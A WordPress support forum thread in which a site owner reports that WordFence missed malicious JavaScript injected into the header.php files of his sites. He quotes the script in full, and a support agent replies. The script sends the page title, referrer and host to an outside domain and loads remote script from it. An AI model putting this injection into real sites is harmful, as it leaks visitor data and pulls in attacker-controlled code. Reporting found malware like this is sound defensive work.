• So I purchased WordFence for all my sites, and earlier this week I got a notification from Hostgator that my account was suspended due to malware on my sites. I was baffled by this because I always keep all my core engines and plugins up to date, and also my sites are simply content-based without anything fancy on them. I ran a scan on WordFence on all sites, and it said everything was clean and no malware was found.

    I contacted Hostgator again and their admin team confirmed there was definitely malware on the sites. I checked with Norton Security

    So I had to go in the WP editor and look inside all files. I was finally ableto find out that some malicious code have been injected on ALL header.php files. Here is the malicious code:

    <script>var a=”; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = “https://homefurniture-ltd.com/js/jquery.min.php&#8221;; var n_url = base + “?default_keyword=” + default_keyword + “&se_referrer=” + se_referrer + “&source=” + host; var f_url = base + “?c_utt=snt2014&c_utm=” + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== ” && se_referrer !== null && se_referrer !== ”){document.write(‘<script type=”text/javascript” src=”‘ + f_url + ‘”>’ + ‘<‘ + ‘/script>’);}</script>

    I had to delete this code manually and now my sites are finally clean. My questions are simple:

    1) Why wasn’t WordFence able to detect such easily noticeable malicious code?

    2) Why did WordFence allow the code injection to happen in the first place? Shouldn’t it block foreign access to such core files? Or at least notify me about it?

    3) Is WordFence going to be able to block these in the future, or should I look for another solution?

    https://www.ads-software.com/plugins/wordfence/

Viewing 1 replies (of 1 total)
  • Hi.

    We’re sorry you are having problems. I’d be happy to answer your questions. Can you help me by answering some so I can give you better answers?

    a. You mentioned purchasing Wordfence. If you are a premium customer, were you aware you get premium support at https://support.wordfence.com?

    b. Can you attach a screenshot of your complete options page when you open a ticket at the above url?

    c. If you are using country blocking, I’ll need to see a screenshot of that page.

    d. Lastly, screenshot your scan page, specifically the scan results section.

    Thanks and I look forward to working with you in the premium support system.

    tim

Viewing 1 replies (of 1 total)
  • The topic ‘Extremely Disappointed in WordFence…’ is closed to new replies.